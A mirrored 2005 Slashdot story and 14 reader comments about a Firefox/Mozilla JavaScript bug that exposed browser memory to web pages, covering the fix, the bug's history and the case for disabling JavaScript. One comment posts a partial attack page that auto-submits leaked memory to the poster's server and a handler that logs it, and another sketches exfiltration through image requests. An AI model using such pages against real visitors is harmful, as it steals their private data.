Slashdot Mirror

← Back to Stories (view on slashdot.org)

Mozilla / Firefox Memory Exposure Vulnerability

Posted by timothy on from the mine-sure-is-vulnerable dept.

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

14 of 132 comments (clear)

  1. Re:Confusing write-up by cjsnell · · Score: 5, Informative

    Can a remote site actually get access to this information, or is it only displayable on the screen?

    The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

    Yes, this is very dangerous.

  2. Re:Confusing write-up by orangesquid · · Score: 2, Informative

    AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.

    --
    --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  3. Re:Did the Mozilla/Firefox guys ignore a warning? by DJayC · · Score: 2, Informative
    According to bugzilla it's fixed on the trunk. The last comment for the bug associated with this vulnerability says:

    Fixed on trunk, AVIARY_1_0_1_20050124_BRANCH, and MOZILLA_1_7_BRANCH.

    Thanks for the report, I hope that's the last bug from 1997 left ;-).

    /be
  4. Re:Did the Mozilla/Firefox guys ignore a warning? by Vaevictis666 · · Score: 5, Informative

    From the bugzilla bug report (copy it, they disallow /. links):

    Opened: 2005-04-01 13:40 PDT
    Last modified: 2005-04-01 22:39 PDT
    Resolution: FIXED

    So yes they did, it was fixed in under 10 hours, and published 3 days later.

  5. Re:It looks like it requires Javascript by ChipMonk · · Score: 2, Informative

    Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.

  6. Re:I'm shocked! by FidelCatsro · · Score: 2, Informative
    from the looks of it , these problems are not affecting the rest of the OS(as far as i can tell from the explination on secuna) i did a few tests and it is only reading the memory area from the browser , how far into the memory it can go i do not know (does it say ? the secuna advisory is shallow on details as ussual).
    Well unlike MSIE this is a bug rather than a feature(ActiveX) and all software has bugs but aparently it is patched so will be rolled out soon.
    Getting details on this is not the easyes but acording to the bug reports someone was saying the problem was perhaps in the browser for the last 8 years..
    ------ Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------

    BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

    r=norris,waldemar
    Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
    encode & decode routines.

    Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
    hunks of that revision:

    @@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
    @@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

    that half-fixed the original 1997-era bug.

    /be
    --
    The only things certain in war are Propaganda and Death. You can never be sure which is which though
  7. No problem here by jkerman · · Score: 2, Informative

    just displays all "XXXXXXXXXXX" for me.

    using OSX with nightly builds auto-downloaded with FireFix (which is a really neat app)

  8. Re:Did the Mozilla/Firefox guys ignore a warning? by Anonymous Coward · · Score: 3, Informative

    You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

  9. Ok, confirmed by cjsnell · · Score: 4, Informative
    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {

    First peice of readMemory() removed to satisfy Slashdot crapfilter
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.nasty.result.value = mem;

    document.nasty.submit();

    }

    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    open(OUTFILE,'>>/tmp/outfile');
    print $result OUTFILE;
    close(OUTFILE);
    </%init>
  10. Download the latest patched version right here by OmegaGX · · Score: 3, Informative

    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nig htly/latest-trunk/firefox-1.0+.en-US.win32.install er.exe
    I just used it and I am not vulnerable: all I see are lot's of X's just like in IE.

  11. Re:I'm shocked! by NanoGator · · Score: 3, Informative

    "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

    It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.

    (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

    (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

    --
    "Derp de derp."
  12. Re:Access to firefox heap, not entire system by Anonymous Coward · · Score: 1, Informative

    Seeing as many sites (including /.) require javascript to use, this really isn't a good option.

    This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.

    So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascipt for that one website, and switch it off again afterwards.

    As far as I can tell, the #1 problem with switching Javascript off is clueless web developers doing <a href="#" onclick... for popups which is completely unnecessary and ignorant.

  13. Re:Access to firefox heap, not entire system by TheGratefulNet · · Score: 2, Informative

    slash requires js?

    since when?

    I disable js for all but 1 or 2 sites that I visit.

    prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.

    but you don't need js for slash. you never have.

    --

    --
    "It is now safe to switch off your computer."
  14. Re:Did the Mozilla/Firefox guys ignore a warning? by BinLadenMyHero · · Score: 2, Informative

    copy it, they disallow /. links

    Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.